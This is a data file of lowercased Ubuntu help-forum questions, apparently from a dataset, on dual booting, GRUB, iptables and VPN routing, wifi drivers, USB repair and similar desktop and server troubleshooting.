460162	burning .iso with windows	i 've got a problem with burning .iso file with windows 8.1 on ubuntu . i 've installed ubuntu 14.04 and unfortunately corrupted win 8 bootloader , it goes back to grub when i try to fire it up , or reboots a system , when i try to load it directly ( set up bios to start windows 8 ) . so i downloaded new windows 8.1 copy ( the official , clean version from dreamspark ) but i 've got 0xo00000e9 error when i try to run it . i burnt it twice , once with brasero , and once with k3b so i guess i 'm doing something wrong . did anyone successfully burnt windows dvd on ubuntu , and have some advice about that ?
460163	black grub with purple border	after a fresh install of ubuntu 14.04 i ca n't get into my windows 7 partition . the grub screen appears black with a purple border but i can not choose anything . if i try a sudo update-grub then i get a working grub screen but if i run ubuntu i get kernel panics .
460165	numlock on in logon screen ( lubuntu 14.04 )	i just installed a danish version of the lubuntu 14.04 and i have fought with this problem = numlock is off when the logon dialog comes up and my users have numbers in their passwords ! i have tried , i would say , all of the methods i found in this forum and none of them worked . i shall say that some methods describes dialogs that i do n't have or that looks different and don*t have the fields mentioned in that method . other methods describes adding a line to files that are non-existent or have no content at all - and if i that add the line described as the only line in that file , the machine wont start . i 'm very frustrated to be the only one in the world where numlock ca n't be set on in the logon dialog . i 'm not that skilled in this linux world , so bare with me . do you have a bullet proof method that can bee used to set the numlock on when the logon dialog is shown on the screen after re-boot ?
460169	how to add icons to templates	i have some templates in my ~/templates folder , but there is no icons in context menu for any of them except the default `` empty document '' . when i search i found this post and it is almost two years old , are there any solutions ?
460173	if laptop is in sleep and the battery gets critically low , will ubuntu put computer to hibernate ?	i know that on windows this happens , but i do n't knw weather it works on ubuntu . so , the question is : if laptop is in sleep and the battery gets critically low , will ubuntu put computer to hibernate ?
460174	write permissions not allowed on my usb key	i can read/write my usb key normally on windows xp . on ubuntu 12.04 i can only read it . i tried sudo to chmod with 777 my usb key but ubuntu does not allow me that . why this problem happens ? how can i fix it ?
460175	log in broken ? giving me nothing but a screen with the wallpaper , and i can hardly move the mouse	i recently decided to install ubuntu 14.04 via usb 2.0 onto my windows vista pc . i read on the forums that you can do that , so i went ahead and did that . i used pendrivelinux to get the files for ubuntu on my usb . so , i followed all of the steps , and i chose `` something else '' for my instillation type . i 'm not sure what i did wrong , but when i finished the instillation and rebooted , it prompted me to a login screen , which i correctly entered in my password , then it brought me to the home screen . but , here 's where the problems are . as soon as i log in , it brings me to the default wallpaper for ubuntu 14.04 , and it does n't bring up the side bar , i ca n't search for anything , and it does n't bring up the top menu bar thingy . also , i ca n't move my mouse . after trying to move my mouses for awhile , it will bring me a glitched home screen , with a white bar and the color of the wallpaper , but repeated and stretched across the screen , kind of like a windows . can someone help me , or tell me what i did wrong , and how to fix it ? please help . thanks , kloiz
460177	iptables ruleset blocking lan and wan	having problems with your intel i217-v ethernet port ? i suggest you read this entire post . whilst drivers were not my issue , nor my answer ( in the end ) , this post will still provide useful insight . in other flavours of debian that i 've used , i would simply edit /etc/network/interfaces to force a static ip . however , i ca n't seem to that in ubuntu server 14.04 ! my /etc/network/interface is : auto lo iface lo inet loopback auto em1 iface em1 inet static address 192.168.0.5 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 dns-nameservers 8.8.8.8 pre-up iptables-restore < /etc/iptables.rules i 've got dns-nameservers in there as to my understanding , this will resolve the issue of /etc/resolv.conf being wiped upon each initalisation of the nic . plus , i ca n't seem to remove the dhcp-client in ubuntu 14.04 , along with being unable to restart the networking service - i have to ifdown and ifup for changes to take affect . so anyway , a little more on my issue . if i of course revert back to using dhcp by changing static to dhcp , then problem solved . i can ping the router , all connected nodes on lan and get internet access . although , i ca n't when statically configured with the above , despite the settings being identical to eachother when looking at ifconfig . to my limited knowledge , i 'd say this has high relevance to being a dns issue . can someone please shed some light ? it 's driving me nuts . if it 's any consolation , i have ssh guard installed and it has its own chain in iptables . update : the following paragraph is n't relevant to my question , but more of a solution if anybody experiences issue with their intel i217-v ethernet adapter and believe it 's driver related . the paragraph after the links will progress to detail the rest of my issue ... ok , turns out it was my iptables ruleset . however , i think it is incredibly important to note here that the increasing and recent developement there is the for e1000e drivers of the intel corporation ethernet connection i217-v ( rev 05 ) . below is 1 driver made by intel , and the other is a community based . the community based seems to be preferable according to many blogs and forum posts i 've read this evening . give them ago if you fear your problems derive from a suspect driver issue . intel ~ https : //downloadcenter.intel.com/detail_desc.aspx ? dwnldid=15817 community based ~ http : //sourceforge.net/projects/e1000/files/latest/download ... progressing on to more relevant matters ... if i commented out the pre-up iptables-restore < /etc/iptables.rules in my interfaces file , i had no problems what so ever . dhcp or static . so the question is , what is in my ruleset to be so connectivity-paranoid ? # generated by iptables-save v1.4.21 on sat may 3 01:24:30 2014 *filter : input drop [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 491:1788008 ] : sshguard - [ 0:0 ] -a input -j sshguard -a input -p tcp -m tcp -- dport 1019 -j accept -a input -p tcp -m tcp -- dport 80 -j accept -a input -p tcp -m tcp -- dport 443 -j accept -a input -p udp -m udp -- dport 53 -j accept -a input -p tcp -m tcp -- dport 8112 -j accept -a input -p tcp -m tcp -- dport 58846 -j accept -a input -p tcp -m tcp -- dport 62598 -j accept -a input -s 192.168.0.0/24 -p tcp -m tcp -- dport 445 -j accept -a input -s 192.168.0.0/24 -p tcp -m tcp -- dport 137 -j accept -a input -s 192.168.0.0/24 -p tcp -m tcp -- dport 138 -j accept -a input -s 192.168.0.0/24 -p tcp -m tcp -- dport 139 -j accept -p input drop commit # completed on sat may 3 01:24:30 2014
460186	turned off webapps , now ca n't relaunch because it requires webapps	i accidentally turned of webapp support in the latest version of the unity tweak tool application . now i get this error when i try to launch it : how can i turn webapps back on ?
460187	problems in installing ubuntu 14.04 ! black screen appears suddenly	problems in installing ubuntu 14.04 ! i was having a difficulty when i tried to install ubuntu 14.04 from usb.when my computer booted from usb , first thing i saw was a pink background with a symbol of a keyboard and a man with a circle aronud it and then after few seconds the screen turned black ! and i was forced to stop the installation as there was no response from the computer.somebody plzzzz ... help !
460188	unity launcher icon boxes missing 14.04lts 64bit	i just ran across an issue which i have never seen before and i was unable to google anything useful regarding this as well . basically , after i set my unity launcher icon size to 32 , the icons lost their background boxes . uploaded image : http : //postimg.org/image/mwq4crb7p/ what i was able to learn is that these images are located in /usr/share/unity/icons/ the icons do exist . ( squircle_base_54.png , etc ) however i 'm afraid that something has broken that links the images to the launcher . i have tried resetting the compiz config and unity with the following commands without any success : unity-reset dconf reset -f /org/compiz/ rm -rf ~/.config/compiz-1/compizconfig setsid unity i am running on ubuntu 14.04lts 64bit and i appreciate any help that can be provided as i 'm not that good in linux based systems yet . i only know the basics .
460189	users logged in but ca n't see them	i am just starting with linux commands , so my question might sound incredibly stupid . i am studying the command line , yesterday i was creating and deleting users . when trying to delete a user ( bart ) i had created with the command deluser bart it says that bart is still logged in . i thought that the command w shows people logged in . so i tried it , and it did not mention bart . however , when trying to delete bart again i would get the same reply . is that normal ? am i using the wrong command to see who is logged in ? i did that and i logged out bart . however , i still do n't understand why i ca n't find a command that lists all users logged in .
460194	syndaemon does not deactivate touchpad while typing	i have ubuntu 12.10 installed on an asus zenbook prime ( synaptics touchpad ) . i installed the gnome touchpad controls which are now ( as i inderstand it ) a standard part of ubuntu . however , even though i have `` disable touchpad while typing '' checked , the touchpad remains hypersensitive even while i 'm typing . this means that i often accidentally brush it , or tap the laptop case edges too hard , and the cursor jumps to some other part of the screen . i 've verified that syndaemon is running : josh 2298 0.0 0.0 21004 896 ? s apr16 11:17 syndaemon -i 2.0 -k -r -t this is pretty much the same issue reported in this question , except that asker never got an answer either , so here i 'm asking again . i 've reviewed the other touchpad questions , but either they 're some other issue , or they have never been answered . i 'm happy to play with syndaemon settings , and am willing to consider an upgrade if anyone has direct experience that an upgraded ubuntu fixes this issue .
460195	django chmod using wrong user : group	i have installed django and some other services to start up one front-end community forum . however i 've managed to do it everythings run but i have problem with chmod permissions . my nginx server uses nginx : nginx user/group instead of normal www-data : www-data . my question is how i can configure the django thing to work with the same chmod user : group becouse at the moment every css/img/js and other stuff from the forum is missing and returns 404 error page . also i forgot to mention that i have completely removed www-data user and group from my ubuntu cuz i do n't need it .
460199	installing ubuntu over windows - dangerous ?	i want to erase windows 7 and install ubuntu instead . i am not a pro user , so i have some questions : a ) is it possible , that some devices do n't work afterwards ? b ) i have a little sister , and she will probably want to play games someday - how is the situation with games ? c ) what are the `` worst case scenarios '' regarding installation ? like if i do smth wrong , can the pc become inoperable ? regards
460201	screen recorders force close in 14.04	i tried screen recording with kazam and when i started the recording it forced closed , so i tried with another one , called simple-screen-recorder and the same thing happened , once i launched the recording . thats what i got in terminal : ==================== ssr started ==================== simplescreenrecorder 0.2.2 compiled with gcc 4.8.2 qt : header 4.8.6 , lib 4.8.6 libavformat : header 54.20.3 , lib 54.63.104 libavcodec : header 54.35.0 , lib 54.92.100 libavutil : header 52.3.0 , lib 52.18.100 libswscale : header 2.1.1 , lib 2.2.100 [ detectcpufeatures ] cpu features : mmx sse sse2 sse3 ssse3 sse4_1 sse4_2 avx avx2 bmi1 bmi2 [ pagerecord : :startpage ] starting page ... [ pagerecord : :startpage ] started page . [ pagerecord : :stoppage ] stopping page ... [ pagerecord : :stoppage ] stopped page . [ pagerecord : :startpage ] starting page ... [ pagerecord : :startpage ] started page . [ pagerecord : :startoutput ] starting output ... [ muxer : :init ] using format matroska ( matroska ) . [ baseencoder : :createcodec ] using codec libx264 ( libx264 h.264 / avc / mpeg-4 avc / mpeg-4 part 10 ) . [ libx264 @ 0x25be000 ] using sar=1/1 segmentation fault ( core dumped ) any help ? -- thanks .
460202	how do i return my usb to normal	i 've been messing around with my usb , trying to make a live usb with debian on it . i used the dd command in the terminal . after multiple failures i just gave up , and i want the usb back to normal . i tried fixing it whit the kde partition manager , realizing that i suck with the terminal . the manager displays the drive and the sdb1 partition on it but the file system is unknown . i ca n't do anything other than delete the partition . the partition is successfully deleted and i 'm left with unallocated space . i click on `` new partition '' , keep the settings normal , ext2 file system , and then apply changes . here 's where the errors happen and the operation is aborted . this is the output : job : check file system on partition ‘/dev/sdb1’ command : e2fsck -f -y -v /dev/sdb1 e2fsck 1.42.9 ( 4-feb-2014 ) /dev/sdb1 is in use . e2fsck : can not continue , aborting . check file system on partition ‘/dev/sdb1’ : error create a new partition ( 14.91 gib , ext2 ) on ‘/dev/sdb’ : error i 've tried formatting to different file systems but i always get the same error , i also tried formatting it on a windows machine but with no success either .
460206	must copy and rename file	hi all i was asked to find the terminal command that will make a copy of a file lets call it program3.cpp and give to the copy the name homework6.cpp . after that you will have two files with different names , but identical contents . i know how to copy the file but i cant figure out how to create a second identical file with a different name . all help is appreciated . thanks !
460210	using find and stat to display filename ( s ) and statistics	i 'm trying to run a command to find all files starting with 'geo ' and see when they were edited . i am trying to following but unfortunately am having no luck.. is there a param for stat to display the filename or do i need a multi-line bash script ... this works : find . -name 'geo* ' -exec stat -c % y { } \ ; this does n't : # find . -name 'geo* ' -exec echo { } & & stat -c % y { } \ ; find : missing argument to `-exec'
460217	wifi drops sporadically on lenovo x201 , i 'm running latest xubuntu	i 'm not sure what is happening as this is a recent occurrence . the wifi light on my thinkpad shuts off and i lose wifi connection . i can not turn the receptor on again by flipping the switch . however , if i reboot i regain wifi and the wifi light turns back on , but later the same issue happens again . i do not know if this is a hardware issue or a xubuntu bug . any help is appreciated . thank you
460218	mysql jdbc connection using eclipse	i have now read numerous installation guides and spent a few days reading in different forums , but i can not get my program to find the class com.mysql.jdbc.driver the current status is : i have added the mysql-connector-java.jar file ( i picked version 5.1.16 and removed the version number from the name ) to /usr/share/java/ and to /usr/lib/jvm/java-6-openjdk-amd64/jre/lib as well as /usr/lib/jvm/java-6-openjdk-amd64/jre/lib/ext ( according to tests this is the java version that is currently used on my machine ) i have also added the same jar to the classpath in the run configurations of eclipse as well as to the java build path / libraries i have also edited the classpath to include /usr/share/java/mysql-connector-java.jar down the road i have tried mysql.jar , mysql-connector-java-5.1.16.jar and other versions . i also tried running it outside of eclipse , no difference . i am getting frustrated , very frustrated and would be very grateful for help making this work for me ! ! the line that causes the exception is : class.forname ( `` com.mysql.jbdc.driver '' ) .newinstance ( ) ; and the exception is : java.lang.classnotfoundexception : com.mysql.jbdc.driver
460223	all at commands failed , only at is accepted	i have 3g modem , but i ca n't connect to the internet because it ca n't send at commands . a single at is the only one that is accepted . i tried to send at commands manually via cutecom , these are the results : at ok atz error at+cops ? error at+cpin= error at+cgdcont=1 , '' ip '' , '' myapn '' error at+ error at+thisgivesmeerrortoo error at+alsothis error this lokks like it ca n't accept more than 2 characters at ( * ) commands , but just at . i have no idea what 's wrong .
460224	numix removes borders and colors in unity launcher	i recently re-installed ubuntu 14.04 , when i installed the numix gtk theme , the borders of all the icons in the unity launcher dissapeared along with the colors , i tried relogging , re-applying the theme , re-installing the theme and a lot more with ubuntu tweak and unity tweak tool . this was n't the case before i re-installed .
460225	can not dual boot 14.04 with windows 7	my problem is that my hp laptop came with four partitions on my 750gb hard disk . i have tried to `` shrink '' the largest partition to 320gb with success in order to create a `` swap area '' and a primary area with the `` / '' designator . when i reboot with my usb flash `` live drive '' , the installation program will start to work . i go through the various steps until i am at the installation choice . i chose `` something else '' . on all the instructional videos , i am supposed to have a free space created by the new unallocated partition . instead , the installation software considers my new unallocated partition as `` unusable '' and because of this , i am unable to dual boot 14.04 . i have learned that the problem is those preexisting four partitions ( three created by windows 7 and one created by hewlett packard ) . i have learned that i can not have more than four partitions on this hard disk . one video found a solution by removing one of the partitions ( i assume it was the `` hp_tools '' partition ) . when the fourth partition was removed , the `` unusable '' partition now becomes `` free space '' and the primary and swap area partitions can now be created and ubuntu 14.04 can be installed as a dual boot . i do not know if this solution is correct or proper . what puzzles me is that i was running dual boot windows 7 and ubuntu 13.10 without any problems . the `` upgrade manager '' suggested that i upgrade to 14.04 . i tried and that is when my installation nightmare began . the upgrade manager loaded 14.04 to my laptop , but 14.04 would not boot up ! ! i created the usb drive with 14.04 installation and tried to use it to help boot up . i accidentally wiped out the entire hard disk and had it dedicated to 14.04 . it works ! ! but i wanted a dual boot . i have reloaded windows 7 and am trying to dual boot 14.04 . none of your instructions are helping me because of my 4 partitions . is there any other way to dual boot 14.04 without removing that 4th partition ?
460226	ubuntu 14.04 does n't start	when booting , ubuntu does n't continues from the following page : what could be the problem ? thanks
460227	i want to dual boot windows with ubuntu	my computer originally had windows 8 on it . i completely reformatted my laptop and put ubuntu 14.04 on it . i tried using wine but it wo n't run my technic launcher for mine craft . i also ca n't get the linux version of the technic launcher to work . so , i want to reinstall windows 8 beside the ubuntu so i can use the 8 for gaming and the ubuntu for the rest of it .
460228	14.04 explore files on android via bluetooth	my laptop ( ubuntu 14.04 ) has a built-in bluetooth support and i 've successfully paired it to my android smartphone . i do n't want to send files from laptop to smartphone or vice versa . nor do i want to connect via usb cable . what i 'm trying to do is to explore/read files from my laptop on my smartphone via bluetooth , like it 's connected with an usb cable . any idea how to do this ?
460229	failed install of 14.04 computer shut down during install but after download	i accidentally shut off my computer during an upgrade from a previous version ( i think it was 12.10 ) . it was after the download was complete , but only about 15 % through the install process . i have some photos , so a wipe of the partition and starting over is out of the question . i am dual booting with windows 7 , and it is a company computer that only barely tolerates my venture away from windows .
460230	how to get ubuntu to load via dvd onto pc on xp	downloaded the 32bit desktop 14.04 version using a windows 7 laptop . i have checked the download using winmd5sum - ok- and burned a dvd using deepburner . after several tries at booting the pc in which i set it to boot from dvd via f2 and f11 , the screen showed the deep red ubunto screen with 2 small white images at the bottom then the screen quickly went blank with a message window from the maker in a far eastern alphabet which includes an exclamation mark in a triangle . have tried several times and on one occasion i accidently pressed f2 later , the language choice list in ubuntu came up and a page where i chose 'try without installing ' . it quickly reverted to the blank screen with the screen image with exclamation mark as above .
460232	autohide launcher is cut off / clipped in 14.04	with autohide enabled on 14.04 ( unity 3d ) , my launcher ends up cut off , clipped , ie . does n't come completely back out of hiding . it still functions fine ... but it 's about 20 % still off the edge of the screen . it did not do this at first , just started to today . nothing i can think of has changed though . if i disable autohide , the launcher shows up fine . i tried with different sized icons and had the same problem . i have a gtx 760 with the 331.38 proprietary and tested nvidia drivers driving mirrored 1080p displays that both show the same thing . anyone run into this , or have any ideas ?
460233	ca n't restore my gpt data with gdisk	so i have a pre-instaled windows 7 efi boot on ssd in gpt ubuntu installer could n't recongize the ssd so i saw that i should try to zap the gpt using gdisk , before doing that i made a backup to a file of the gpt data . now that the ssd has no gpt windows 7 wont boot at all , so i went back to gdisk to restore the gpt data and i am unable kubuntu @ kubuntu : ~ $ sudo gdisk /dev/sda gpt fdisk ( gdisk ) version 0.8.8 partition table scan : mbr : protective bsd : not present apm : not present gpt : not present creating new gpt entries . command ( ? for help ) : r recovery/transformation command ( ? for help ) : l enter backup filename to load : gpt_original recovery/transformation command ( ? for help ) : w warning ! secondary partition table overlaps the last partition by 33 blocks ! you will need to delete this partition or resize it in another utility . aborting write of new partition table . note that before deleting gpt i already had the 33 blocks overlap and windows 7 booted ok. is there a way to force gdisk to restore my gpt with my backup ?
460234	pac ssh manager on ubuntu 14.04 does not work	i am using ubuntu 14.04 . for ssh , i am using pac manger . it was working perfectly on ubuntu 12.04 but after upgrading to 14.04 pac does not work . when i run it from the terminal it says : ca n't locate object method `` new '' via package `` gnome2 : :vte : :terminal '' ( perhaps you forgot to load `` gnome2 : :vte : :terminal '' ? ) at /opt/pac/lib/pacterminal.pm line 501 . i try to install missed perl modules by typing : $ cpan gnome2 : :vte : :terminal but that says `` this modue does not exist. '' . what is the proper way to getting run it on ubuntu 14.04 ?
460237	3.5 '' drive runs continuously	i installed ubuntu on an old xp desktop with cd and 3.5 inch drive . the 3.5 inch drive runs continuously . i installed the equivalent of device manager can found the drive but could not disable it . is there an easy way to disable this drive ? i suppose the other option is to open the desktop and disconnect it . any ideas that someone not familiar with linux could understand and follow ?
460240	13.04 server as a router with openvpn to provider	i 'm having a devil of a time getting accurate information on this setup ... searches result in info all over the map . anyway , i have a 13.04 server ( cli only ) which has my comcast cablemodem connected to eth0 and my home lan connected to eth1 . currently i have the standard nat setup to get everything out the door to the internet : iptables -t nat -a postrouting -o eth0 -j masquerade now , what i want to add is an openvpn connection to a 3rd party provider and tunnel all internet traffic through the openvpn tunnel . the thrust of this exercise is to avoid any fiddly stuff that comcast has been known to do ( interception of dns , web caching , who knows what else ) . the vpn provider 's system automagically builds the proper openvpn client.conf file for their service : remote x.x.x.x 500 udp remote x.x.x.x 123 udp remote x.x.x.x 53 udp key-direction 1 cipher aes-256-cbc client dev tun resolv-retry infinite nobind persist-key persist-tun verb 4 reneg-sec 86400 echo vpn-dc31 ovpn156 tun-mtu 1500 route-method exe route-delay 2 redirect-gateway def1 comp-lzo adaptive explicit-exit-notify 2 fragment 1390 mssfix 1390 hand-window 30 < certificates & keys removed > i can start the openvpn service and the tunnel comes up successfully on tun0 : tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.8.4.230 p-t-p:10.8.4.229 mask:255.255.255.255 but then i notice i have 2 default routes and i ca n't ping anything on the internet neither from the ubuntu server itself , nor the lan clients : destination gateway genmask flags mss window irtt iface 0.0.0.0 10.8.4.229 128.0.0.0 ug 0 0 0 tun0 0.0.0.0 < comcast > 0.0.0.0 ug 0 0 0 eth0 10.8.4.225 10.8.4.229 255.255.255.255 ugh 0 0 0 tun0 10.8.4.229 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 < comcast > 0.0.0.0 255.255.252.0 u 0 0 0 eth0 128.0.0.0 10.8.4.229 128.0.0.0 ug 0 0 0 tun0 192.168.10.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 < ovpn provider > < comcast > 255.255.255.255 ugh 0 0 0 eth0 i 'm pretty certain there 's some iptables work that needs to be done , and that 's what i need help with . the provider is no help , if it 's not dd-wrt or tomato , or a simple linux client , it 's `` not supported '' . also , i accept internet connections on certain ports ( like ssh , http , etc . ) so i can get into the ubuntu server remotely , and i want those connections to go through the vpn also . the vpn provider gives me a static ip on their side . finally , i want this to all work automatically . if the tunnel goes down , it should re-establish . if i reboot the server , it should all come back up automatically . thanks for any help or advice !
460241	moving ubuntu to new server	i have an old dell precision 390 desktop with ubuntu 10.04 that stopped booting because of `` a thermal event '' . i cleaned it , reset the logs but it still wo n't boot . not sure what my options are , but if i have to replace the machine , i am not really sure how to copy over my configurations - jenkins , postgres , mysql , java , grails , etc . i thought i would move the hd over , but i doubt that would work . the searches i have found indicate a backup copy ( which i stupidly never did since it was `` just a dev box '' ) , or just doing a copy from the old to new hd . but since i ca n't boot this machine anymore , i ca n't do that . is it possible to just remove the hd and put it in a new computer ?
460246	iptables ruleset blocking all network activity ?	i 've gone through numerous trial and error to recently discover that my iptables result is the culprit of blocking all lan and wan activity . i know this , because if i comment out the last line in my interfaces fill - shown below - i can have usual lan and wan access . however , if i do not , i can ping my router , any other node or any unresolved domains . i doubled check to see if it was the iptables ruleset , by performing iptables-restore < /etc/iptables.rules . therefore , this demonstrates the last line in the interfaces file is legal , furthermore confirming that my errors are n't a result of the misuse of the interfaces file . auto lo iface lo inet loopback auto em1 iface em1 inet static address 192.168.0.5 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 dns-nameservers 8.8.8.8 pre-up iptables-restore < /etc/iptables.rules what is it about my ruleset that is causing such restrictive network access ? # generated by iptables-save v1.4.21 on sat may 3 01:24:30 2014 *filter : input drop [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 491:1788008 ] : sshguard - [ 0:0 ] -a input -j sshguard -a input -p tcp -m tcp -- dport 1019 -j accept -a input -p tcp -m tcp -- dport 80 -j accept -a input -p tcp -m tcp -- dport 443 -j accept -a input -p udp -m udp -- dport 53 -j accept -a input -p tcp -m tcp -- dport 8112 -j accept -a input -p tcp -m tcp -- dport 58846 -j accept -a input -p tcp -m tcp -- dport 62598 -j accept -a input -s 192.168.0.0/24 -p tcp -m tcp -- dport 445 -j accept -a input -s 192.168.0.0/24 -p tcp -m tcp -- dport 137 -j accept -a input -s 192.168.0.0/24 -p tcp -m tcp -- dport 138 -j accept -a input -s 192.168.0.0/24 -p tcp -m tcp -- dport 139 -j accept -p input drop commit # completed on sat may 3 01:24:30 2014
460248	14.04 instalation	i have 2 systems , a dell 755 desktop & an acer 5515 laptop . both have 500gb drives with windows 7 dual booted with ubuntu 12.04 . made dvd from iso and installed 14.04 into dell system . at install menu it said that it detected multiple operating systems and the 1st option was to install along side windows in dual boot . chose that option and 14.04 installed no problems on the dell 755 desktop . then tried to install 14.04 onto the acer system at install menu it said it detected multiple systems but no option to dual boot . all options were to basically format the drive and only install ubuntu . both systems had more than enough space to install 14.04 so why does the 14.04 install dvd only do a dual boot install on the 755 but refuses to install dual boot on the 5515 . unfortunately , i 'm not savvy enough to install 14.04 manually into the 5515 as a dual boot setup .
460249	scanner/ocr problem	love ubuntu 14 . only glitch is with my hp envy 4500 all in one . scans are tricky w/xane as it will not scan for ocr . ditto for ocr feeder . printer says it ca n't find software though it will scan pictures . suspect i 'm missing something on the hp software installation but have no clue how to fix .
460250	if [ -e $ name ] ; what -e does ?	someone could helps me saying me what -e does within an if construct an followed by a directory or file ? thanks very much
460253	replacing windows and trying to figure out how to backup old files on ubuntu	i 'm using windows vista , however , the os had numerous problems so i decided to fix it with the installation disc . yet , i ca n't seem to find it so i 'm planning to use ubuntu as the os and backup the files from vista . is that possible ? if so , can you explain how it could be done . note : it 's possibility it could be either windows vista or windows 7 . also you may noticed that i 'm new to linux os , so i need help switching over from windows to linux .
460258	nautilus crashes after upgrade ( 12.04lts- > 14.04lts )	i 've upgraded my 12.04lts ubuntu to 14.04lts . everything installed fine , however my 'nautilus ' is behaving weird . it crashes every time i try to open a folder.. my whole desktop is blank . when i press files it restarts the file manager ( showing stuff on my desktop and opening a new window with the files ) . but when i press any item ( file or folder ) it crashes everything , showing nothing ( no desktop files or folders and window goes away ) . i 've checked many 'solutions ' that did n't work for me , for example : nautilus does n't work ... . from command or from unity any suggestions what i can do ? things i 've already done : reinstalled nautilus installed some packages ( python-nautilus i believe ? ) fully ( +purged ) removed nautilus and installed it again something with samba ? idk lol btw . i have also an ssd with a clean install of ubuntu 14.04 that works totally fine ! edit : this guy has a similar problem to me : http : //nerdanswer.com/answer.php ? q=339938 permissions are also fine ( root : root , chmod=755 ) i ran nautilus -c which did gave me a specific error : running nautilus_self_check_file_utilities running nautilus_self_check_file_operations running nautilus_self_check_directory running nautilus_self_check_file fail : check failed in nautilus-file.c , line 8334 evaluated : nautilus_file_get_name ( file_1 ) expected : eazel : /// got : eazel : running nautilus_self_check_canvas_container looking now how to fix , anyone suggestions.. ?
460260	vga output not aligned with available monitor space	when xp stopped receiving support a few weeks ago , my employer allowed us to take home the towers after they were wiped and installed with ubuntu , with no keyboards , mice or monitors . the only monitor i have available at home is my television , a 42 inch lg 520 , which has a vga port . while the computer boots , either bios or ubuntu booting , the image is rendered fully across the screen , but once the operating system is running , the image is shifted to the right about an inch . the white dot you see in the black there is the flash of my smartphone reflecting off of the bezel . the resolution is correct , and there 's another inch on the right that i ca n't see as it is rendered off of the screen . what can i do to remedy this ?
460261	dual boot partition problem	when trying to create a dual boot ( windows and ubuntu ) i ran in some trouble . because i do already have 4 partitions , the 5th one is unusable for ubuntu to install . now i 'm really hesitating which one could be deleted or not . i have the following partitions : device type size used system /dev/sda1 ntfs 104mb 25mb windows 7 ( loader ) /dev/sda2 ntfs 877973mb 195685mb unusable 56624mb an /dev/sda3 ntfs 64424mb 24054mb /dev/sda4 ntfs 1065mb 218mb windows recovery environment ( loader ) as you can see , sda2 is my main partition , and sda 3 is my driver partition . can i safely remove sda1 or sda4 partition ? i 'm not sure what the `` loader '' is supposed to do .
460265	no sound after installing ubuntu 14.04 lts	i decided to install ubuntu 14.04 on my old compaq cq56 100xx notebook but after installing i get no sound from the speakers and nothing when i plug my headphones in . these are the dump volumes welcome to pulseaudio ! use `` help '' for usage information . sink 0 : reference = 0 : 102 % 1 : 102 % , real = 0 : 102 % 1 : 102 % , soft = 0 : 102 % 1 : 102 % , current_hw = 0 : 100 % 1 : 100 % , save = yes source 0 : reference = 0 : 100 % 1 : 100 % , real = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 100 % 1 : 100 % , save = no and this was the dump from my alsa output zane @ zane-pc : ~ $ dmesg | egrep -i ' ( alsa|sound|snd
460268	how can i connect to wlan with my bcm4313 ( 14e4:4727 ) ?	i am looking for help for getting my broadcom wlan card working on my laptop with ubuntu . until now i was not able to get it to work . solutions i tried for now : 1. using the additional driver that can be installed via the ubuntu additional driver menu 2. using ndiswrapper with the appropriate windows xp driver for the bcm4313 both solutions seem to have the same problems . you can scan for available wlans ( iwlist scan ) . also wlan frontends from ubtuntu and kubuntu can find wlans . but connecting to them is not successful . finally i did my tests using the wicd-client frontend . question : how can i fix the problem so i can connect to the network ? how can i see what is going wrong ? my hardware : > lspci -vnn | grep 14e4 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) uname -r 3.13.0-24-generic first test using ndiswrapper : windows xp driver : h20565.www2.hp.com/portal/site/hpsc/template.page/public/psi/swddetails/ ? cc=us & lang=en & sp4ts.oid=3688870 & switem=ob_101092_1 & ac.admitted=1399152253163.876444892.492883150 > dmesg [ 30.871555 ] ndiswrapper : module verification failed : signature and/or required key missing - tainting kernel [ 30.871610 ] disabling lock debugging due to kernel taint [ 30.874973 ] ndiswrapper version 1.59 loaded ( smp=yes , preempt=no ) [ 31.470169 ] usbcore : registered new interface driver ndiswrapper [ 405.925514 ] usbcore : deregistering interface driver ndiswrapper [ 405.949538 ] ndiswrapper version 1.59 loaded ( smp=yes , preempt=no ) [ 405.980682 ] ndiswrapper : driver bcmwl5 ( broadcom,03/22/2010 , 5.60.350.6 ) loaded [ 405.997568 ] ndiswrapper : using irq 17 [ 406.260345 ] wlan0 : ethernet device 7c : e9 : d3:12:2b : e6 using ndis driver : bcmwl5 , version : 0x53c15e0 , ndis version : 0x501 , vendor : 'ndis network adapter ' , 14e4:4727.5.conf [ 406.263500 ] wlan0 : encryption modes supported : wep ; tkip with wpa , wpa2 , wpa2-psk ; aes/ccmp with wpa , wpa2 , wpa2-psk [ 406.264752 ] usbcore : registered new interface driver ndiswrapper [ 406.308733 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready > /var/log/syslog may 3 20:28:01 bell networkmanager [ 1301 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) may 3 20:28:27 bell dhclient : internet systems consortium dhcp client 4.2.4 may 3 20:28:27 bell dhclient : copyright 2004-2012 internet systems consortium . may 3 20:28:27 bell dhclient : all rights reserved . may 3 20:28:27 bell dhclient : for info , please visit https : //www.isc.org/software/dhcp/ may 3 20:28:27 bell dhclient : may 3 20:28:27 bell dhclient : listening on lpf/wlan0/7c : e9 : d3:12:2b : e6 may 3 20:28:27 bell dhclient : sending on lpf/wlan0/7c : e9 : d3:12:2b : e6 may 3 20:28:27 bell dhclient : sending on socket/fallback may 3 20:28:27 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > disabled may 3 20:28:27 bell kernel : [ 1869.577168 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready may 3 20:28:27 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : disabled - > scanning may 3 20:28:27 bell wpa_supplicant [ 4144 ] : wlan0 : ctrl-event-terminating may 3 20:28:27 bell networkmanager [ 1301 ] : < info > wpa_supplicant stopped may 3 20:28:27 bell networkmanager [ 1301 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > 